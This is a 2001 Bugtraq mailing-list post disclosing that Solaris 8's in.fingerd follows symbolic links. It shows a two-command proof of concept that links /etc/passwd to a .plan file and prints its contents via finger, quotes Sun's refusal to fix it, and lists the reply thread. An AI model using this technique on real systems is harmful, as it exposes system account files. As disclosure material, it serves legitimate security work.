Bugtraq mailing list archives

in.fingerd follows sym-links on Solaris 8

From: Lukasz Luzar <lluzar () developers of pl>
Date: Thu, 24 May 2001 18:14:59 +0200 (CEST)

Hello,

 Solaris 8 is still vulnerable to the old bug in in.fingerd daemon.

 lluzar@sun:~ (101) > ln -s /etc/passwd .plan
 lluzar@sun:~ (102) > finger -l lluzar () sun developers of pl
 [localhost]
 Login name: lluzar             In real life: Lukasz Luzar
 Directory: /home/lluzar        Shell: /bin/tcsh
 On since May 19 20:17:04 on pts/70 from unix.developers.of.pl
 Mail last read Sat May 19 13:51:12 2001
 Plan:
 root:x:0:1:Super-User:/root:/sbin/sh
 daemon:x:1:1::/:
 bin:x:2:2::/usr/bin:
 sys:x:3:3::/:
 .
 .

 I believe it could be dangeours in some cases, but people from
 Sun says that they won't repair the in.fingerd because:

 "There are may be legitimate reasons for finger to follow symlinks. If
 finger is considered a security issue, it can be disabled. (..)"

 What do you think ?

Cheers,

--
Lukasz Luzar
http://Developers.of.PL/
Crede quod habes, et habes

Current thread:

in.fingerd follows sym-links on Solaris 8 Lukasz Luzar (May 24)
- Re: in.fingerd follows sym-links on Solaris 8 Lyndon Nerenberg (May 24)
- <Possible follow-ups>
- Re: in.fingerd follows sym-links on Solaris 8 Matthew R. Potter (May 24)
- Re: in.fingerd follows sym-links on Solaris 8 Lukasz Luzar (May 25)
  - Re: in.fingerd follows sym-links on Solaris 8 J. Bol (May 28)
  - Re: in.fingerd follows sym-links on Solaris 8 Joep Vesseur (May 28)
- Re: in.fingerd follows sym-links on Solaris 8 Darren Moffat (May 28)